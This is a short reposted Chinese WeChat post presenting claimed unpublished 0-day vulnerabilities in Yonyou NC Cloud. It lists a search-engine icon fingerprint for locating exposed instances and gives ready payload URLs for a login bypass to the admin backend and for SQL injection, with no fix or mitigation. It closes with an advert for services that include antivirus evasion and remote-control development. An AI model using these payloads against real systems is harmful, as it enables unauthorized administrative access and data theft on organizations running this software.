0x01 前言
目前是有两个漏洞,一个是SQL注入漏洞一个是登录绕过漏洞,助力第二阶段0Day演练。
Hunter指纹: web.icon==
"a5dccf6af79f420f7ea2f2becb6fafa5"
0x02 登录绕过漏洞
Payload: mp/loginxietong?username=admin
输入Payload后直接访问/mp即可进入管理员后台
##0x03 SQL注入漏洞
Payload: portal/pt/PaWfm/open?pageId=login&proDefPk=1*
0x03 结尾
承接红蓝对抗、安全众测、安全培训、CTF代打、CTF培训、PHP / JAVA / GO / Python 代码审计、渗透测试、应急响应、免杀/远控开发、二进制漏洞挖掘、Web3安全服务、智能合约代码审计 等等的安全项目,请联系下方微信。
原文始发于微信公众号(不懂安全的校长):未公开漏洞情报|用友NC Cloud 0Day漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论